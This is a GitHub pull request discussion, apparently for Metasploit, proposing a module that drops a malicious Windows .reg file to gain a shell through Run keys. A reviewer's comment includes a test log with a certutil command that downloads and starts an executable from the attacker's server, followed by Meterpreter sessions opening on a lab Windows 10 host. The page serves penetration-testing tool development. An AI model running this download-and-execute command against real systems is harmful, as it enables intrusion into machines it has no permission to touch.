Skip to content

Add Malicious Windows Registration Entries (.reg) File module #20384

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

Add Malicious Windows Registration Entries (.reg) File module #20384

wants to merge 1 commit into from

Conversation

bcoles
Copy link
Contributor

@bcoles bcoles commented Jul 13, 2025

This is unlikely to allow initial access without substantial social engineering efforts, as uncompressed .reg files are blocked by Outlook and Run[Once] keys are monitored, but a shell is a shell and it's not stupid if it works.

@bcoles bcoles added the module label Jul 13, 2025
@msutovsky-r7 msutovsky-r7 self-assigned this Jul 14, 2025
msutovsky-r7
msutovsky-r7 reviewed Jul 15, 2025
View reviewed changes
Copy link
Contributor

@msutovsky-r7 msutovsky-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Would it make sense to run handler in the module rather than just drop file?

msf6 exploit(multi/handler) > run verbose=true
[*] Command to run on remote host: certutil -urlcache -f http://192.168.3.7:8080/g7dX6dKZEs4KZYEuEJH2KQ %TEMP%\NqMGWibK.exe & start /B %TEMP%\NqMGWibK.exe
[*] Fetch handler listening on 192.168.3.7:8080
[*] HTTP server started
[*] Adding resource /g7dX6dKZEs4KZYEuEJH2KQ
[*] Started reverse TCP handler on 192.168.3.7:4444 
[*] Client 10.5.132.151 requested /g7dX6dKZEs4KZYEuEJH2KQ
[*] Sending payload to 10.5.132.151 (Microsoft-CryptoAPI/10.0)
[*] Client 10.5.132.151 requested /g7dX6dKZEs4KZYEuEJH2KQ
[*] Sending payload to 10.5.132.151 (CertUtil URL Agent)
[*] Sending stage (203846 bytes) to 10.5.132.151
[*] Client 10.5.132.151 requested /g7dX6dKZEs4KZYEuEJH2KQ
[*] Sending payload to 10.5.132.151 (Microsoft-CryptoAPI/10.0)
[*] Client 10.5.132.151 requested /g7dX6dKZEs4KZYEuEJH2KQ
[*] Sending payload to 10.5.132.151 (CertUtil URL Agent)
[*] Sending stage (203846 bytes) to 10.5.132.151
[*] Meterpreter session 2 opened (192.168.3.7:4444 -> 10.5.132.151:49681) at 2025-07-15 13:06:36 +0200

meterpreter > [*] Meterpreter session 3 opened (192.168.3.7:4444 -> 10.5.132.151:49684) at 2025-07-15 13:06:37 +0200

meterpreter > 
meterpreter > sysinfo
Computer        : WIN10_21H1_540C
OS              : Windows 10 21H1 (10.0 Build 19043).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN10_21H1_540C\msfuser

@bcoles
Copy link
Contributor Author

bcoles commented Jul 15, 2025

Would it make sense to run handler in the module rather than just drop file?

Maybe. Maybe not. It could be hours or days before a session is received.

The existing approach is inconsistent, with about 40% of file format modules explicitly opting out of starting a handler:

# ls modules/exploits/windows/fileformat/ | wc -l
191
# grep -rni DisablePayloadHandler modules/exploits/windows/fileformat/ | grep true | wc -l
73
# grep -rni DisablePayloadHandler modules/exploits/windows/fileformat/ | grep false | wc -l
11

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@msutovsky-r7 msutovsky-r7 msutovsky-r7 left review comments

At least 1 approving review is required to merge this pull request.

Assignees

@msutovsky-r7 msutovsky-r7

Labels
docs module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
2 participants
@bcoles @msutovsky-r7